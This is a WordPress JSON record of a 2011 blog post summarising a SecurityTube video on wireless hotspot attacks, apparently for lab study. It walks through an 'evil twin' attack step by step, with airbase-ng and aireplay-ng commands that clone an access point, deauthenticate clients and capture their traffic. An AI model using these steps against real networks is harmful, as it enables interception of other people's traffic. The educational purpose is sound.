{"id":484,"date":"2011-10-17T21:59:37","date_gmt":"2011-10-17T21:59:37","guid":{"rendered":"http:\/\/41j.com\/blog\/?p=484"},"modified":"2011-10-17T21:59:37","modified_gmt":"2011-10-17T21:59:37","slug":"securitytube-wireless-lan-security-megaprimer-notes-part-9-hotspot-attacks","status":"publish","type":"post","link":"https:\/\/41j.com\/blog\/2011\/10\/securitytube-wireless-lan-security-megaprimer-notes-part-9-hotspot-attacks\/","title":{"rendered":"SecurityTube, Wireless Lan Security Megaprimer notes: part 9 (Hotspot attack basics)"},"content":{"rendered":"<p>Vivek&#8217;s video is <a href=\"http:\/\/www.securitytube.net\/video\/1779\">here<\/a>.<\/p>\n<p>Vivek shows you how to setup a fake software access point and force existing clients to connect to it in preference to the original access point. From this point a number of attacks could be launched, including man-in-the-middle attacks. These attacks are not discussed in detail here.<\/p>\n<p>Wireless hotspots are usually Open Auth, sometimes have MAC filtering, no encryption (can&#8217;t really work here). May have application layer authentication (login portal).<\/p>\n<h2>Attacks<\/h2>\n<p>* Create an &#8220;evil twin&#8221;:<br \/>\n  * Same ESSID<br \/>\n  * Same BSSID (optional)<\/p>\n<p>* Use de-auth to break client connections<\/p>\n<p>* If our &#8220;evil&#8221; network has higher strength, then client will connect to it preferentially.<\/p>\n<p>* Further attack options then exist. (metasploit the client, man in the middle)<\/p>\n<p>0. Locate your target network with airodump. (For the lab setup an AP with no encryption, in the examples it&#8217;s called SecurityTube)<\/p>\n<p>1. Use airbase-ng to create an access point.<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\niwconfig wlan0 channel NN # can be any channel\r\nairbase-ng -a AA:AA:AA:AA:AA:AA -e SecurityTube mon0\r\n<\/pre>\n<p>This access point has 2 interfaces. One is mon0, the wireless interface.<br \/>\nairbase-ng creates a virtual network device called at0. This is the wired side of access point.<\/p>\n<p>2. Bring up the virtual interface<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\nifconfig at0 up\r\n<\/pre>\n<p>That was just to test things out, kill airbase-ng.<\/p>\n<p>3. Connect a client to the real access point.<\/p>\n<p>4. Deauth all clients<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\niwconfig channel NN # same channel as REAL AP.\r\naireplay-ng --deauth 0 -a BSSID_OF_REAL_AP mon0 # BSSID found in airodump\r\n<\/pre>\n<p>Leave this running in the background.<\/p>\n<p>5. Bring up airbase-ng again. In this case, we&#8217;re running airbase on the same channel (so we can send deauths in the background).<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\nairbase-ng -a AA:AA:AA:AA:AA:AA -e SecurityTube mon0 # BSSID can be anything.\r\n<\/pre>\n<p>6. Try and connect your client again. Your client should connect to your soft access point.<\/p>\n<p>7. Capture some data with wireshark on at0.<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\nifconfig at0 up #bring up at0\r\n<\/pre>\n<p>After a while, the client will give up trying to obtain a DHCP address.<br \/>\nIt will assign itself an autoconfig address. You&#8217;ll see this in wireshark.<br \/>\nSource address will be listed as 169.x.x.x, in Vivek&#8217;s case he saw IGMP packets.<\/p>\n<p>8. Assign at0 an address in this range and attempt to ping the client:<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\nifconfig at0 169.254.174.XX netmask 255.255.255.0 up #where 169.254.174.XX is an address in the same range as the client.\r\nping &lt;address found in wireshark&gt;\r\n<\/pre>\n<p>You can now access the client at the IP level.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vivek&#8217;s video is here. Vivek shows you how to setup a fake software access point and force existing clients to connect to it in preference to the original access point. From this point a number of attacks could be launched, including man-in-the-middle attacks. These attacks are not discussed in detail here. Wireless hotspots are usually [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[1],"tags":[14,13,12,10,11],"class_list":["post-484","post","type-post","status-publish","format-standard","hentry","category-uncategorized","tag-pentest","tag-security","tag-securitytube","tag-wifi","tag-wifiprimer"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p1RRoU-7O","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/posts\/484","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/comments?post=484"}],"version-history":[{"count":1,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/posts\/484\/revisions"}],"predecessor-version":[{"id":485,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/posts\/484\/revisions\/485"}],"wp:attachment":[{"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/media?parent=484"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/categories?post=484"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/tags?post=484"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}